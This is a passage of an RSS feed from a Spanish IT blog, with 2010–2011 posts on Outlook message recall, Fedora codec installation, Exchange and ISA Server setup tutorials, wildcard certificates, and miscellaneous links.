mensaje de su buzón.</div><div class="p3"> NOTA   Si el mensaje original está marcado como leído (en este escenario, si este mensaje se ve en el Panel de lectura, no significa que se lea) al intentar recuperar el mensaje, al destinatario se le informará de que el remitente desea eliminar el mensaje, pero el mensaje permanecerá en la carpeta de Outlook del destinatario.</div></td></tr><tr><td class="td1" valign="middle">Envía un mensaje de correo electrónico a una persona. Recupera el mensaje original y lo sustituye por uno nuevo.<br /><div class="p3">En el equipo del destinatario, en Opciones de seguimiento, Procesar convocatorias y respuestas al recibirlas no está activado.</div></td>       <td class="td1" valign="middle">Tanto el mensaje original como el mensaje de recuperación llegan a la Bandeja de entrada del destinatario.<br /><div class="p3">En el equipo del destinatario se dará una de las siguientes situaciones:</div><div class="p3"><span class="Apple-tab-span"> </span>• Si el destinatario abre primero el mensaje de recuperación, el mensaje original se borrará y al remitente se le informará de que el destinatario borró el mensaje de su buzón.</div><div class="p3"><span class="Apple-tab-span"> </span>• Si el destinatario abre primero el mensaje original, la recuperación no se realizará y tanto el mensaje original como el nuevo estarán disponibles.</div><div class="p3"> NOTA   Si el mensaje original está marcado como leído (en este escenario, si este mensaje se ve en el Panel de lectura, no significa que se lea) al intentar recuperar el mensaje, al destinatario se le informará de que el remitente desea eliminar el mensaje, pero el mensaje permanecerá en la carpeta de Outlook del destinatario.</div></td>     </tr><tr>       <td class="td1" valign="middle"><br /><div class="p3">Envía un mensaje de correo electrónico a una persona. Recupera el mensaje original y lo sustituye por uno nuevo.</div><div class="p3">En el equipo del destinatario, bien al establecerse mediante una regla, o bien por ejecución del destinatario, el mensaje original se mueve a otra carpeta y el mensaje de recuperación permanece en la Bandeja de entrada (o se mueve a otra carpeta).</div></td>       <td class="td1" valign="middle">Si el mensaje de recuperación y el mensaje original se encuentran en carpetas independientes, el destinatario recibirá un mensaje indicando que no se pudo realizar un intento de recuperación. Esto ocurre independientemente de la configuración de Outlook y del estado de lectura del mensaje.<br /><div class="p3">El destinatario dispone del mensaje original y del nuevo mensaje.</div><div class="p3"> NOTA   Si el destinatario lee el mensaje original y, a continuación, lo marca como No leído, Outlook lo tratará como si nunca se hubiera leído y lo recuperará correctamente.</div></td>     </tr><tr>       <td class="td1" valign="middle">Envía un mensaje de correo electrónico a una persona. Recupera el mensaje original y lo sustituye por uno nuevo.<br /><div class="p3">En el equipo del destinatario, bien por una regla bien por el destinatario, ambos mensajes se mueven a la misma carpeta. Esto resulta en un comportamiento similar al que ocurre cuando Outlook no está configurado para procesar automáticamente mensajes.</div></td>       <td class="td1" valign="middle">En el equipo del destinatario se dará una de las siguientes situaciones:<br /><div class="p3"><span class="Apple-tab-span"> </span>• Si el destinatario abre primero el mensaje de recuperación, el mensaje original se borrará y al remitente se le informará de que el destinatario borró el mensaje de su buzón.</div><div class="p3"><span class="Apple-tab-span"> </span>• Si el destinatario abre primero el mensaje original, la recuperación no se realizará y tanto el mensaje original como el nuevo estarán disponibles.</div><div class="p3"> NOTA   Si el destinatario lee el mensaje original y, a continuación, lo marca como No leído, Outlook lo tratará como si nunca se hubiera leído y lo recuperará correctamente.</div></td></tr><tr><td class="td1" valign="middle">Envía un mensaje de correo electrónico a una carpeta pública. Recupera el mensaje original y lo sustituye por uno nuevo.</td>       <td class="td1" valign="middle">Se da una de las siguientes situaciones:<br /><div class="p3"><span class="Apple-tab-span"> </span>• Si el destinatario que lee el mensaje de recuperación creó y tiene acceso de lectura a todos los elementos de la carpeta pública, y no leyó el mensaje original, la recuperación se realiza correctamente y sólo permanece el nuevo mensaje. El remitente recibe un mensaje indicándole que la recuperación se realizó correctamente.</div><div class="p3"><span class="Apple-tab-span"> </span>• Si el destinatario ya ha marcado como leído el mensaje original, se le informa de que no pudo realizarse la recuperación y sólo se elimina el mensaje de recuperación.</div><div class="p3">Si un usuario con otros derechos en la carpeta pública abre el mensaje de recuperación, la recuperación no puede llevarse a cabo y el usuario recibe un mensaje indicándole que la recuperación no se realizó correctamente. El mensaje nuevo y el original permanecen en la carpeta pública.</div><div class="p3"> NOTAS </div><div class="p3"><span class="Apple-tab-span"> </span>• Si el destinatario lee el mensaje original y, a continuación, lo marca como No leído, Outlook lo tratará como si nunca se hubiera leído y lo recuperará correctamente.</div><div class="p3"><span class="Apple-tab-span"> </span>• En la carpeta pública, son los derechos de lectura y, no del remitente, los que determinan si la recuperación se realizará o no correctamente.</div></td>     </tr></tbody> </table></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Albúm de fotos en color de Nueva York en la década de 1940</title>
      <link>https://www.igalvan.es/posts/album-de-fotos-en-color-de-nueva-york_9797/</link>
      <pubDate>Mon, 01 Aug 2011 14:08:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/album-de-fotos-en-color-de-nueva-york_9797/</guid>
      <description><![CDATA[<p>No puedo evitarlo, me encantan las fotografías que muestran la vida en lugares conocidos en otros tiempos. En este caso son de la ciudad de Nueva York en la década de los años cuarenta del siglo XX. Aquí os dejo el <a href="http://www.howtobearetronaut.com/2011/07/new-york-1940s-in-colour/" target="_blank">enlace</a>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Videos certificación SQL Server 2008</title>
      <link>https://www.igalvan.es/posts/videos-certificacion-sql-server-2008_5400/</link>
      <pubDate>Fri, 15 Jul 2011 06:55:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/videos-certificacion-sql-server-2008_5400/</guid>
      <description><![CDATA[<p>Hoy os traigo un enlace interesante sobre una colección de videos de preparación para las certificaciones de MS SQL Server 2008 gracias a cyberHades.<br /><br /><a href="http://www.cyberhades.com/2011/07/11/videos-de-preparacion-para-la-certificacion-microsoft-sql-server-2008/"><a href="http://www.cyberhades.com/2011/07/11/videos-de-preparacion-para-la-certificacion-microsoft-sql-server-2008/">http://www.cyberhades.com/2011/07/11/videos-de-preparacion-para-la-certificacion-microsoft-sql-server-2008/</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>He instalado Fedora 15 y ¿dónde están mis codecs?</title>
      <link>https://www.igalvan.es/posts/he-instalado-fedora-15-y-donde-estan_9731/</link>
      <pubDate>Sun, 29 May 2011 11:52:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/he-instalado-fedora-15-y-donde-estan_9731/</guid>
      <description><![CDATA[<p>Si hay algo que tengo claro desde hace ya bastante tiempo es que Fedora es mi distribución, y no es por falta de probar, he pasado por decenas de distribuciones diferentes y aunque cada una tiene sus ventajas y desventajas, por un motivo u otro nunca quedaba medianamente satisfecho, y si no que se lo pregunten a mis compañeros de trabajo.<a name='more'></a><br /><br />Una de las pocas cosas que no me gustan de Fedora es su obsesión por no incluir por defecto software con patentes de software de ningún tipo. Es una de esas cosas que no entiendo, por lado se intenta crear un sistema operativo de escritorio &ldquo;para todo el mundo&rdquo;, pero por otro lado eliminas hasta la posibilidad de instalarlo, y no ya la versión privativa sino hasta las alternativas libres basadas en esa patente. Para no seguir desbarrando, vamos a lo que nos interesa, voy a redactar una serie de comandos que podéis lanzar desde la <span style="font-style: italic;">shell</span> de comandos para hacer vuestra vida más fácil y algo menos libre también. Recuerda que debes ejecutar estos comandos como usuario con privilegios de administrador, normalmente el usuario <span style="font-style: italic;">root</span>.<br /><br /><ul><li>Lo primero es instalar los repositorios necesarios, en este caso los de LIVNA<em>:</em></li></ul><em><br /></em><span style="font-size:85%;"><span style="font-family:courier new;">[root@maquina ignacio]#rpm -ivh <a href="http://rpm.livna.org/livna-release">http://rpm.livna.org/livna-release</a>.</span>rpm</span><span style="font-size:85%;"><span style="font-family:courier new;"><span style="font-style: italic;"><br /></span></span></span><span style="font-size:85%;"><span style="font-family:courier new;">[root@maquina ignacio]#</span></span><span style="font-size:85%;"><span style="font-family:courier new;">rpm –import /etc/pki/rpm-gpg/RPM-GPG-KEY-livna</span></span><br /><br /><ul><li>Y ahora instalamos los <span style="font-style: italic;">codecs</span> multimedia:</li></ul><br /><span style="font-size:85%;"><span style="font-family:courier new;">[root@maquina ignacio]</span></span><span style="font-size:85%;"><span style="font-family:courier new;">#yum install gstreamer-plugins-bad gstreamer-plugins-bad-nonfree gstreamer-plugins-ugly gstreamer-ffmpeg</span></span><br /><br />Y ahora a disfrutar de vuestros vídeos favoritos.<br /><br />PD: Si queréis saber más de la política de <span style="font-style: italic;">codecs</span> de Fedora os dejo el siguiente <a href="http://fedoraproject.org/wiki/CodecBuddy">enlace</a>.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Instalar Exchange 2010  SP1 en Windows 2008 R2 SP1</title>
      <link>https://www.igalvan.es/posts/instalar-exchange-2010-sp1-en-windows_5907/</link>
      <pubDate>Fri, 11 Mar 2011 21:21:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/instalar-exchange-2010-sp1-en-windows_5907/</guid>
      <description><![CDATA[<p>Una buena noticia para los administradores de <i>Exchange</i>. No sé si has instalado <i>Exchange</i> 2010 SP1 sobre <i>Windows</i> 2008 R2, pero si no lo has hecho y tienes la intención de hacerlo será mejor que leas esto antes. Aprovechate del principio del mínimo esfuerzo e instala previamente el <i>Service Pack</i> 1 de <i>Windows</i> 2008 R2 y todo será mucho más fácil, puesto que ya incluye todos las actualizaciones que necesitas para realizar una instalación mucho más sencilla, y sobre todo, rápida.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Las dificultades de la gestión automatizada de las listas blancas de remitentes de correo electrónico</title>
      <link>https://www.igalvan.es/posts/las-dificultades-de-la-gestion_4193/</link>
      <pubDate>Sun, 06 Feb 2011 09:17:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/las-dificultades-de-la-gestion_4193/</guid>
      <description><![CDATA[<p>Tras este larguísimo título se esconde un buen artículo que trata conceptos básicos sobre la gestión automatizada de listas blancas de remitentes de correo electrónico aplicables a cualquier sistema de filtrado de correo.<br />Aunque me hubiera gustado traducirlo al español, siguiendo mi política habitual, no me es posible debido a la licencia de derechos de autor por lo que tendréis que leerlo en un bonito español de Londres.<br /><br /><a target="_blank" href="http://www.exchangeinbox.com/article.aspx?i=170">ExchangeInbox.com - Email Auto-Whitelisting Pitfalls</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Diccionario de bilbaino</title>
      <link>https://www.igalvan.es/posts/diccionario-de-bilbaino_2090/</link>
      <pubDate>Mon, 24 Jan 2011 07:32:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/diccionario-de-bilbaino_2090/</guid>
      <description><![CDATA[<p>Un poco de humor de mi tierra.<br /><a href="http://diccionario.bilbao.im/">Diccionario de bilbaino</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Fotos de Londres en el año 1880</title>
      <link>https://www.igalvan.es/posts/fotos-de-londres-en-el-ano-1880_7924/</link>
      <pubDate>Fri, 14 Jan 2011 07:10:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/fotos-de-londres-en-el-ano-1880_7924/</guid>
      <description><![CDATA[<p>Un enlace con fotos sobre Londres sobre el año 1880 y es que hay cosas que no cambian y no me refiero a los edificios. Ya me entendéis, o eso espero.<br /><br /><a href="http://www.laboiteverte.fr/londres-en-1880/"><a href="http://www.laboiteverte.fr/londres-en-1880/">http://www.laboiteverte.fr/londres-en-1880/</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>¡Feliz cumpleaños Exchange 2010!</title>
      <link>https://www.igalvan.es/posts/feliz-cumpleanos-exchange-2010_8199/</link>
      <pubDate>Mon, 13 Dec 2010 16:40:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/feliz-cumpleanos-exchange-2010_8199/</guid>
      <description><![CDATA[<p>Y es que el tiempo parece volar&hellip; Hace ya un año que se publicó la RTM de Exchange 2010, ahora ya tenemos el SP1 con nosotros y un futuro muy prometedor para nuestro servidor de correo favorito.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>La lista de replicas de carpetas públicas desaparece en Exchange 2010 RTM de forma aleatoria</title>
      <link>https://www.igalvan.es/posts/la-lista-de-replicas-de-carpetas_8058/</link>
      <pubDate>Sun, 17 Oct 2010 20:10:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/la-lista-de-replicas-de-carpetas_8058/</guid>
      <description><![CDATA[<p>No hay que alarmarse, mucho&hellip;<br /><br />Para que pueda sucederte este problema en la organización se tienen que cumplir tres requisitos:<br /><ul><li>Debió existir en algún momento una instalación de <i>Exchange</i> 5.5,</li><li>Se debió hacer uso de las carpetas públicas.</li><li>Has desplegado <i>Exchange</i> 2010 RTM.</li></ul><a name='more'></a><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> Si este es tu caso, veras que el problema se produce cuando utilizas la consola de administración de carpetas públicas de <i>Exchange</i> 2010 RTM, el cmdlet <i>Set-PublicFolder</i> o la herramienta <i>ExFolders</i>. Cuando realizas la modificación te pueden pasar tres cosas:</div><ul><li>Que se actualicen correctamente.</li><li>Que desaparezcan una parte de las replicas.</li><li>Que desaparezcan todas y tengas que recuperar la información de las mismas desde una copia de seguridad.</li></ul>Se trata de un error reconocido por <i>Microsoft</i> que tan solo afecta a la versión RTM de <i>Exchange</i> 2010 y por suerte, ya se encuentra corregido en el <i>Service</i> <i>Pack</i> 1 de este producto, por lo que se recomienda actualizar lo antes posible. Si no te es posible realizar la actualización por cualquier motivo, que sepas que utilizando las herramientas de administración de <i>Exchange</i> 2003 o <i>Exchange</i> 2007 estarás a salvo de este problema.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>España en el borde</title>
      <link>https://www.igalvan.es/posts/espana-en-el-borde_3976/</link>
      <pubDate>Sun, 12 Sep 2010 07:13:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/espana-en-el-borde_3976/</guid>
      <description><![CDATA[<p>Este artículo no tiene nada que ver con informática, pero me ha encantado. Los españoles tenemos el grave defecto de creer que todo lo de fuera es más bonito, mejor, &hellip; Estoy seguro que hay mucha más gente que conoce Roma, París o Londres que cualquiera de las ciudades españolas de las que se habla en este enlace que os dejo a continuación. Simplemente increíble y maravilloso. <a href="http://www.kuriositas.com/2010/09/spain-on-edge.html" target="_blank">España en el borde</a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Publicar los servicios web de cliente de Exchange 2007 con ISA Server 2006 SP1 (Introducción)</title>
      <link>https://www.igalvan.es/posts/publicar-los-servicios-web-de-cliente_458/</link>
      <pubDate>Sun, 09 May 2010 12:43:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/publicar-los-servicios-web-de-cliente_458/</guid>
      <description><![CDATA[<p>Me he decidido a escribir esta serie de artículos sobre <i>ISA Server 2006</i> y mi producto preferido, <i>Exchange Server</i>, porque revisando la literatura en <i>Internet</i> al respecto, apenas he encontrado información al respecto en nuestro idioma y me pareció una buena oportunidad para comenzar a redactar un tutorial, hablar de estos dos productos que van tan unidos.<br /><br />Este laboratorio no simula ningún entorno de producción real, simplemente es un documento que pretende establecer una guía rápida de asimilación de conceptos que sirva como base de aprendizaje, así que no intentéis ponerlo en práctica en vuestra red sino queréis veros con un bonito agujero de seguridad.<br /><br /><a name='more'></a>Para hacerlo lo más ameno posible, y no crear un documento megalítico y soporífero, me he decidido a dividir la serie en cinco artículos diferentes que enumero a continuación:<br /><ul><li>Publicar los servicios web de      cliente de <i>Exchange 2007</i> con <i>ISA Server 2006  SP1</i> (Introducción)</li><li>Publicar los servicios web de      cliente de <i>Exchange 2007 </i>con <i>ISA Server 2006  SP1</i> (OWA)</li><li>Publicar los servicios web de      cliente de <i>Exchange 2007 </i>con <i>ISA Server 2006 SP1</i> (Outlook      Anywhere)</li><li>Publicar los servicios web de      cliente de <i>Exchange 2007 </i>con <i>ISA Server 2006 SP1</i> (ActiveSync)</li><li>Publicar los servicios web de      cliente de <i>Exchange 2007 </i>con <i>ISA Server 2006 SP1</i> (Pruebas con un      cliente)</li></ul><br />Con el objetivo de no alargar mucho este tutorial, voy a dar por supuesto que ya se conoce el procedimiento de instalación de <i>ISA Server 2006 SP1</i>, así que no lo incluiré en esta serie. Para clarificar el laboratorio, os dejo este esquema de como he montado la infraestructura.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/_J_zCVY2Fcio/TEsHDmHN4ZI/AAAAAAAAABU/dJ1jzR_Sa1o/s1600/lab1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/_J_zCVY2Fcio/TEsHDmHN4ZI/AAAAAAAAABU/dJ1jzR_Sa1o/s320/lab1.png" /></a></div><br /><br />Como prerrequisitos estableceremos los siguientes:<br /><ul><li>Para simplificar el entorno, suponemos que la máquina del <i>ISA Server</i> se encuentra en el dominio olimpo.des.</li><li>Necesitamos un certificado<i> wildcard</i> para el dominio olimpo.des, de esta forma nos ahorramos tener que estar creando uno por máquina. Si no sabéis como obtener este tipo de certificados desde una entidad certificadora de <i>Windows Server</i>, seguid este tutorial que os he preparado en este <a href="http://www.igalvit.es/2010/05/crear-un-certificado-wildcard-para-un-dominio-desde-una-entidad-certificadora-windows-server/" target="_blank" title="Crear un certificado wildcard con Windows Server">enlace</a>.</li><li>Todo el software usado son versiones del producto en español.</li><li>El controlador del dominio principal y el servidor de Exchange 2007 se ha montado con <i>Windows 2008 SP2 Standard Edition</i> sin <i>Hiper-V x64</i> y <i>Exchange Server 2007 SP2 x64</i>.</li><li>Usaremos <i>Windows 2003 R2 Enterprise Edition x32</i> e <i>ISA Server 2006 SP1</i> en la máquina que contendrá el servidor ISA.</li><li>Por último, el cliente de pruebas será también una máquina con <i>Windows 2003 R2 Enterprise Edition x32</i> con <i>Microsoft Outlook 2007 SP2</i>.</li></ul><br />Bueno, hasta aquí este primer capítulo de la serie, en la próxima entrega veremos cómo configurar e instalar el certificado en el servidor Exchange y los paso necesarios para publicar la parte de OWA.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Crear un certificado wildcard para un dominio desde una entidad certificadora Windows Server</title>
      <link>https://www.igalvan.es/posts/crear-un-certificado-wildcard-para-un_1442/</link>
      <pubDate>Sun, 09 May 2010 12:33:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/crear-un-certificado-wildcard-para-un_1442/</guid>
      <description><![CDATA[<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div>Bueno, hoy vamos a ver cómo crear un certificado <i>wildcard</i> usando la entidad certificadora que nos proporciona <i>Windows Server 2008</i>. Si os preguntáis para qué podemos querer un certificado de este tipo, la razón es sencilla, imaginaros que tenéis &nbsp;cinco servidores Exchange, un ISA Server y dos IIS en tu organización. Si quieres usar el servicio de SSL con todos ellos tendrías que crearte ocho certificados individuales y lo peor de todo esto, tienes que mantenerlos controlados, verificar sus fechas de caducidad, etc. ¿No sería mucho más sencillo tener un único certificado para cualquier máquina de ese dominio? A mí me lo parece y eso por eso que siempre uso certificados <i>wildcard</i>.<br /><br /><a name='more'></a>Como prerrequisitos estableceremos&nbsp; dos sencillos puntos:<br /><ul><li>Tener una entidad certificadora Windows 2008 integrada en el dominio.</li><li>Cinco &nbsp;minutos de tiempo para crear el certificado.</li></ul>En mi caso, voy a crear el certificado para mi segundo dominio de pruebas, averno.des. Los pasos serían los siguientes:<br /><ul><li>Abrimos el <i>Administrador de Internet Information Services</i> (IIS) y en el árbol de la izquierda localizamos el servidor IIS sobre el que queremos realizar la solicitud del certificado. Una vez localizado, hacemos doble clic sobre el icono de <b><i>Certificados de servidor</i></b> del panel central de la consola.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_J_zCVY2Fcio/TEsE9jwsfGI/AAAAAAAAAAs/McapMb9c4ww/s1600/wildcard1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/_J_zCVY2Fcio/TEsE9jwsfGI/AAAAAAAAAAs/McapMb9c4ww/s320/wildcard1.png" /></a></div><ul><li>En este segundo paso, debemos hacer clic sobre la opción <b><i>Crear certificado de dominio…</i></b> del panel de la derecha y rellenar los datos que nos solicita el asistente. El único campo con el que tenéis que tener especial cuidado es con el campo de“<b><i>Nombre común</i></b> que debéis rellenarlo con un texto con el formato <b><i><span style="text-decoration: underline;">“*.dominio.ext</span></i></b>” (sin las comillas), fijaros bien, que sino luego el certificado no sirve como <i>wildcard</i>. Una vez completado, tan solo falta hacer clic en el botón <b><i>Siguiente</i></b>.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/_J_zCVY2Fcio/TEsFNwSHfPI/AAAAAAAAAA0/8dK6u4GGSd4/s1600/wildcard2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/_J_zCVY2Fcio/TEsFNwSHfPI/AAAAAAAAAA0/8dK6u4GGSd4/s320/wildcard2.png" /></a></div><ul><li>El tercer paso es seleccionar la entidad certificadora de vuestro dominio que generará el nuevo certificado.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_J_zCVY2Fcio/TEsFUfU7yOI/AAAAAAAAAA8/W7B0oogURds/s1600/wildcard3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_J_zCVY2Fcio/TEsFUfU7yOI/AAAAAAAAAA8/W7B0oogURds/s320/wildcard3.png" /></a></div><ul><li>Por último, una vez generado el nuevo certificado, vamos a comprobar que realmente hemos generado un certificado <i>wildcard</i>. Para comprobarlo tan solo hay que abrir el certificado, y en la pestaña de <b><i>Detalles</i></b>, buscar el campo <b><i>Asunto</i></b>. Deberemos ver un valor para <b><i>CN</i></b> similar al de la imagen que se encuentra a continuación.</li></ul><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/_J_zCVY2Fcio/TEsFbPRBwBI/AAAAAAAAABE/jvQrYYZ4TaE/s1600/wildcard4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/_J_zCVY2Fcio/TEsFbPRBwBI/AAAAAAAAABE/jvQrYYZ4TaE/s320/wildcard4.png" /></a></div><br />Sencillo, ¿verdad?]]></description>
      
    </item>
    
    
    
    <item>
      <title>Publicar los servicios web de cliente de Exchange 2007 con ISA Server  2006 SP1 (Outlook Anywhere)</title>
      <link>https://www.igalvan.es/posts/publicar-los-servicios-web-de-cliente_5599/</link>
      <pubDate>Sat, 08 May 2010 19:42:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/publicar-los-servicios-web-de-cliente_5599/</guid>
      <description><![CDATA[<p>En esta nueva entrega vamos a ver como configurar el servicio de Outlook Anywhere, o más conocido como RPC sobre HTTPS.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Publicar los servicios web de cliente de Exchange 2007 con ISA Server 2006 SP1 (OWA)</title>
      <link>https://www.igalvan.es/posts/publicar-los-servicios-web-de-cliente_3621/</link>
      <pubDate>Sat, 08 May 2010 19:37:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/publicar-los-servicios-web-de-cliente_3621/</guid>
      <description><![CDATA[<p>Partiendo de estos supuestos los pasos serían los siguientes:<br/><br/>Desde la consola de administración de ISA Server, primero hay que  hacer en el nodo &ldquo;Politicas del cortafuegos&rdquo; y posteriormente, en el  panel del lado derecho, en el &ldquo;Panel de tareas&rdquo;,  hay que hacer clic en  la opción &ldquo;publicar cliente web de Exchange&rdquo;.<br/><br/>En la página de bienvenida del asistente para &ldquo;publicar un nuevo  Exchange&rdquo;, hay que introducir un nombre para la regla, en mi caso &ldquo;OWA  2007 Básico&rdquo; y despues hacer clic en &ldquo;Siguiente&rdquo;.<br/><br/>En la página de &ldquo;Selección de servicios&rdquo;, tenemos que seleccionar  &ldquo;Exchange 2007&rdquo; en el menú desplegable de versiones de Exchange. En la  sección de &ldquo;Servicios de cliente de correo web&rdquo;, hay que seleccionar la  casilla de verificación &ldquo;Outlook Web Access&rdquo; y hacemos clic en  &ldquo;Siguiente&rdquo;.<br/><br/>En la página de &ldquo;Tipo de publicación&rdquo;, para nuestro caso,  seleccionamos la opción &ldquo;Publicar un solo sitio web o con balanceo de  carga&rdquo; y hacemos clic en &ldquo;Siguiente&rdquo;.<br/><br/>En la página &ldquo;Seguridad de conexión del servidor&rdquo; debemos seleccionar  la opción &ldquo;Usar SSL para conectar con el servidor web o la granja de  servidores&rdquo;<br/><br/>En la página de &ldquo;Detalles de publicación interna&rdquo; tenemos que  especificar el nombre interno del servidor que se va a publicar. Debemos  tener en cuenta que el nombre debe ser el mismo que el del certificado  que se va a usar. En mi caso, como he usado un wildcard y para poder  diferenciar de forma más clara todas las maquinas, he usado el nombre  FQDN de la máquina del laboratorio, mb1.olimpo.des. El segundo paso en  esta página es seleccionar el objeto de directorio activo del servidor  CAS o poner directamente su IP en el cuador que figura más abajo. Como  ya he comentado más arriba en mi caso el nombre es igual en ambos  campos. Despues de completar estos pasos, podemos hacer clic en  &ldquo;Siguiente&rdquo; y pasaremos a la siguiente página.<br/><br/>En la página &ldquo;Detalles de nombre público&rdquo;, en el menú desplegable  &ldquo;Aceptar peticiones para:&rdquo; seleccionamos la opción &ldquo;Este nombre de  dominio (escribe debajo):&rdquo; y en &ldquo;Nombre público&rdquo; escribimos el nombre  que tendrá en la calle, en mi caso, correo.olimpo.des y hacemos clic en  &ldquo;Siguiente&rdquo;.<br/><br/>En la página &ldquo;Selección de la escucha de web&rdquo; seleccionamos el  escuchador de web que creamos al principio de este artículo y hacemos  clic en el botón &ldquo;Siguiente&rdquo;.<br/><br/>En la página &ldquo;Delegación de la autentificación&rdquo; debemos seleccionar  la opción &ldquo;Autentificación básica&rdquo; del menú desplegable y volvemos a  hacer clic en el botón &ldquo;Siguiente&rdquo;.<br/><br/>En la página de &ldquo;configuración de usuarios&rdquo; tenemos que seleccionar  que usuarios se van a poder conectar al sitio OWA que se va a publicar.  En nuestro caso, vamos a dar por supuesto el caso general, que todos los  usuarios del dominio con un buzón deben poder acceder usando este  servicio, por lo que dejaremos la selección por defecto de &ldquo;Usuarios  autentificados&rdquo; y hacemos clic en el botón &ldquo;Siguiente&rdquo;.<br/><br/>Por último revisamos la configuración y hacemos clic en &ldquo;Finalizar&rdquo;.<br/><br/>Y aquí finaliza esta primera entrega de este tutorial. En la próxima  entrega veremos como configura Outlook Anywhere.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>OCS 2007 R2 sobre Windows 2008 R2</title>
      <link>https://www.igalvan.es/posts/ocs-2007-r2-sobre-windows-2008-r2_7074/</link>
      <pubDate>Fri, 16 Apr 2010 23:05:00 +0100</pubDate>
      
      <guid>https://www.igalvan.es/posts/ocs-2007-r2-sobre-windows-2008-r2_7074/</guid>
      <description><![CDATA[<p>Una buena noticia, ya es posible soportar Office Communicator System 2007 R2 sobre Windows 2008 R2. Aquí os dejo el enlace de la web de soporte de Microsoft. <a title="KB982021" href="http://support.microsoft.com/default.aspx/kb/982021/en-us?p=1" target="_blank"><a href="http://support.microsoft.com/default.aspx/kb/982021/en-us?p=1">http://support.microsoft.com/default.aspx/kb/982021/en-us?p=1</a></a></p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>No arranca el servicio de transport en Exchange 2007 durante la instalación</title>
      <link>https://www.igalvan.es/posts/no-arranca-el-servicio-de-transport-en_5911/</link>
      <pubDate>Tue, 23 Mar 2010 19:56:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/no-arranca-el-servicio-de-transport-en_5911/</guid>
      <description><![CDATA[<p>Esta tarde, montando una maqueta de Exchange 2007 SP1 sobre Windows 2008, me paso una cosa curiosa. Durante el proceso de instalación de Exchange, cuando llega a la parte del concentrador de transporte, se me quedaba colgada la instalación levantando el servicio de Transport. <br /><a name='more'></a><br /><br />La ventana del instalador de Exchange 2007 muestra algo como esto.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/_J_zCVY2Fcio/TEr_77j6wUI/AAAAAAAAAAM/yOQvKOHdeQo/s1600/error_hub1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/_J_zCVY2Fcio/TEr_77j6wUI/AAAAAAAAAAM/yOQvKOHdeQo/s320/error_hub1.jpg" /></a></div><br /><br />Revisando el fichero de logs de la instalación me encontré con estas líneas:<br /><blockquote>[&hellip;]<br /><br />[ERROR] Unexpected Error<br />[23/03/2010 18:52:29] [2] [ERROR] Service &lsquo;MSExchangeTransport&rsquo; failed to start. Error:&lsquo;No se puede iniciar el servicio MSExchangeTransport en el equipo &lsquo;.&rsquo;.&rsquo;.<br />[23/03/2010 18:52:29] [2] [ERROR] No se puede iniciar el servicio MSExchangeTransport en el equipo &lsquo;.&rsquo;.<br /><br />[&hellip;]</blockquote><br />Después de un rato cacharreando, me acorde de un pequeño detalle que no suelo hacer, que esta vez hice&hellip;<br /><br />¡Había desactivado el protocolo IPv6 de la tarjeta de red! Así que nada, lo volví a activar y &hellip; ¡Voila! Al reiniciar la instalación la completó correctamente. Cosas que tiene la vida, bueno, el Exchange.</p>
]]></description>
      
    </item>
    
    
    
    <item>
      <title>Error 0x80004005 mientras instalas OCS 2007 R2 Standard Edition</title>
      <link>https://www.igalvan.es/posts/error-0x80004005-mientras-instalas-ocs_3750/</link>
      <pubDate>Fri, 19 Feb 2010 19:37:00 +0000</pubDate>
      
      <guid>https://www.igalvan.es/posts/error-0x80004005-mientras-instalas-ocs_3750/</guid>
